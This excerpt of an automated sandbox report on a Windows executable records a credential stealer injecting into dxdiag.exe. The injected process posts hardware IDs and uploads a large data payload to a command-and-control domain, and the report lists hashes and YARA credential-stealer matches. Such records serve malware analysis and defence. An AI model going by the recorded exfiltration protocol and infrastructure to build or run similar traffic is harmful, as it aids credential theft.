                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1722&rtt_var=655&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15950&delivery_rate=1695702&cwnd=32&unsent_bytes=0&cid=0dc39b07daee8c71&ts=542&x=0"
                                                                                2024-12-30 14:55:32 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-30 14:55:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                4 | 192.168.2.11 | 49869 | 172.67.148.118 | 443 | 8016 | C:\Windows\SysWOW64\dxdiag.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-12-30 14:55:33 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=5YX4CKCOBDQTSL5T
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 20414
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:33 UTC | 15331 | OUT | Data Raw: 2d 2d 35 59 58 34 43 4b 43 4f 42 44 51 54 53 4c 35 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 35 59 58 34 43 4b 43 4f 42 44 51 54 53 4c 35 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 59 58 34 43 4b 43 4f 42 44 51 54 53 4c 35 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 35 59 58 34
                                                                                Data Ascii: --5YX4CKCOBDQTSL5TContent-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--5YX4CKCOBDQTSL5TContent-Disposition: form-data; name="pid"3--5YX4CKCOBDQTSL5TContent-Disposition: form-data; name="lid"ZqchOa--new--5YX4
                                                                                2024-12-30 14:55:33 UTC | 5083 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 fd 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d ae 2f 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 f5 47 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 be 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 d7 1f 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 fa a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                Data Ascii: lrQM/64G6(X&~`aO
                                                                                2024-12-30 14:55:34 UTC | 1139 | IN | HTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=lql73s0bs515dofgn274scpd60; expires=Fri, 25 Apr 2025 08:42:13 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8KS59rSAifVfHB9gF5awovPuUDhN%2BGzpyd%2FCFfzuetei0hkQshowhIuj%2Fm9v5JETC2yC0az%2B3CvfmwrqRV0rUQQYOJ0%2ByXrAJRmIPiaOjY%2Bcc%2F8hRCXHs00xLhN9FTCiC4na4A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df1caa9b0f3e-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1710&rtt_var=657&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21376&delivery_rate=1707602&cwnd=213&unsent_bytes=0&cid=b15fdb261cd4f6f6&ts=508&x=0"
                                                                                2024-12-30 14:55:34 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-30 14:55:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                5 | 192.168.2.11 | 64243 | 172.67.148.118 | 443 | 8016 | C:\Windows\SysWOW64\dxdiag.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-12-30 14:55:36 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=21MX5AWY95P
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 1174
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:36 UTC | 1174 | OUT | Data Raw: 2d 2d 32 31 4d 58 35 41 57 59 39 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 32 31 4d 58 35 41 57 59 39 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 31 4d 58 35 41 57 59 39 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 32 31 4d 58 35 41 57 59 39 35 50 0d 0a 43 6f 6e 74 65 6e
                                                                                Data Ascii: --21MX5AWY95PContent-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--21MX5AWY95PContent-Disposition: form-data; name="pid"1--21MX5AWY95PContent-Disposition: form-data; name="lid"ZqchOa--new--21MX5AWY95PConten
                                                                                2024-12-30 14:55:37 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 14:55:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=ng0s7o1r79e2tc73icik5bshgb; expires=Fri, 25 Apr 2025 08:42:16 GMT; Max-Age=9999999; path=/
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                cf-cache-status: DYNAMIC
                                                                                vary: accept-encoding
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUT68LBo3HB89RL5DxhgPWQPR3HrhriFhAU%2FGW9xwhCBKf8RbWkoTEwSAA6r%2B0Z%2BncsOV1hsvhPVjgaZ6%2FtDHBG6PsWi%2FklbrvIwCsaSy7UMR1Sgt09rqPVC9TJormyWIqGyRXY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa2df2fe96ec427-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1651&rtt_var=632&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2086&delivery_rate=1715628&cwnd=32&unsent_bytes=0&cid=d0e5b8d7984b4051&ts=895&x=0"
                                                                                2024-12-30 14:55:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                Data Ascii: fok 8.46.123.189
                                                                                2024-12-30 14:55:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                6 | 192.168.2.11 | 64254 | 172.67.148.118 | 443 | 8016 | C:\Windows\SysWOW64\dxdiag.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-12-30 14:55:38 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: multipart/form-data; boundary=HBJCJS19A2ZIMW
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                Content-Length: 586319
                                                                                Host: marbleshinys.click
                                                                                2024-12-30 14:55:38 UTC | 15331 | OUT | Data Raw: 2d 2d 48 42 4a 43 4a 53 31 39 41 32 5a 49 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32 0d 0a 2d 2d 48 42 4a 43 4a 53 31 39 41 32 5a 49 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 42 4a 43 4a 53 31 39 41 32 5a 49 4d 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 48 42 4a 43 4a 53 31 39 41 32
                                                                                Data Ascii: --HBJCJS19A2ZIMWContent-Disposition: form-data; name="hwid"F6FA9AF6A79C6DF138ACDDE148F97B32--HBJCJS19A2ZIMWContent-Disposition: form-data; name="pid"1--HBJCJS19A2ZIMWContent-Disposition: form-data; name="lid"ZqchOa--new--HBJCJS19A2
2024-12-30 14:55:40 UTC | 1143 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 14:55:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=frpkojpbknhefh9m1h7kjp7obj; expires=Fri, 25 Apr 2025 08:42:19 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJ6R%2BCGF16zs2a9oU%2FD%2FwBl%2Bzl%2F4iheiqKjXtzz05LSnv2CDfGzbcC%2Fiz3Sorh6bpj8SgLOHOermwOJ0GgxcubDLlEfNrU6lFN%2FifyOBHtpgHaiKkTqwQoCmN3Srbv705uvLrvs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa2df3b5fc57c96-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1814&rtt_var=682&sent=333&recv=598&lost=0&retrans=0&sent_bytes=2845&recv_bytes=588908&delivery_rate=1602634&cwnd=173&unsent_bytes=0&cid=d2a7674d318f5d6c&ts=1972&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.11 | 64270 | 172.67.148.118 | 443 | 8016 | C:\Windows\SysWOW64\dxdiag.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 14:55:41 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 80
Host: marbleshinys.click
2024-12-30 14:55:41 UTC | 80 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d 26 68 77 69 64 3d 46 36 46 41 39 41 46 36 41 37 39 43 36 44 46 31 33 38 41 43 44 44 45 31 34 38 46 39 37 42 33 32
Data Ascii: act=get_message&ver=4.0&lid=ZqchOa--new&j=&hwid=F6FA9AF6A79C6DF138ACDDE148F97B32
2024-12-30 14:55:41 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 14:55:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=i8jkf4c47vvbj4lfo28cu871kp; expires=Fri, 25 Apr 2025 08:42:20 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3dgqZznk6vHDGALp7IzcgXZtJriIb6goZACv81VKWSYuG12Aku1UFYegr8DNmxsIe7c8T8W5dOubxKnQyWVlaHaCMBA6CCdKHhZOBS2LdppT9WNh2NB8CDIiq7KdV4JTlGNLbXw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa2df4a9f5472b9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1828&rtt_var=715&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=982&delivery_rate=1597374&cwnd=214&unsent_bytes=0&cid=5338809f5ac34861&ts=512&x=0"
2024-12-30 14:55:41 UTC | 54 | IN | Data Raw: 33 30 0d 0a 4a 6d 58 6d 56 36 56 6f 5a 6d 30 6a 76 46 4e 58 45 42 62 67 4e 52 61 58 79 69 54 70 73 53 51 32 61 71 39 37 34 56 41 34 33 6d 35 39 4f 41 3d 3d 0d 0a
Data Ascii: 30JmXmV6VoZm0jvFNXEBbgNRaXyiTpsSQ2aq974VA43m59OA==
2024-12-30 14:55:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 09:55:13
Start date: 30/12/2024
Path: C:\Users\user\Desktop\PI1EA8P74K.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\PI1EA8P74K.exe"
Imagebase: 0x7ff713700000
File size: 12'940'800 bytes
MD5 hash: 4DE5DDC2A970F98EFE99DC22C5B2DE78
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 09:55:15
Start date: 30/12/2024
Path: C:\Windows\SysWOW64\dxdiag.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\dxdiag.exe"
Imagebase: 0xa30000
File size: 222'720 bytes
MD5 hash: 24D3F0DB6CCF0C341EA4F6B206DF2EDF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1571272583.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1567861669.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1570587188.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1569901131.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1585547494.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1570198116.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566987811.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1576883133.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1578784333.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1569019682.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566706853.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1567162517.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566093282.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1540180374.000000000301F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1578277745.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1583499340.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1577721314.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1568656377.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1581059278.000000000301F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1565623403.000000000301F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566593228.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1571636824.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1574086916.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1565979094.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1568493204.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1585491290.0000000003035000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1572522073.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1567592332.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566813341.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1568118321.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566394877.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1571946572.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566212267.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1570969220.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1567305786.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1574970043.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1576032432.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566302806.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1569167137.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1585426357.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1566907407.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1569362451.0000000003020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1386377421.00007FF713701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF713700000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1386354736.00007FF713700000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1386430144.00007FF71376A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1386430144.00007FF71416A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1388498516.00007FF7141C4000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1388715145.00007FF714307000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1388736021.00007FF71430A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1388753682.00007FF714311000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff713700000_PI1EA8P74K.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID:
                                                                                  • API String ID: 2933794660-0
                                                                                  • Opcode ID: ce244896921b2e74160f855e9384b2b9b3893974cbc9c2fcf9eb00448bba2bb9
                                                                                  • Instruction ID: b2281ab6b08f24311fd5b6c8b0e9c8f44e5bf613d765edca16e97f7e54bdf887
                                                                                  • Opcode Fuzzy Hash: ce244896921b2e74160f855e9384b2b9b3893974cbc9c2fcf9eb00448bba2bb9
                                                                                  • Instruction Fuzzy Hash: 07113026B14F018AFB00DF61E8952B873B4F719768F841E35EA6E477A4DF78D1588350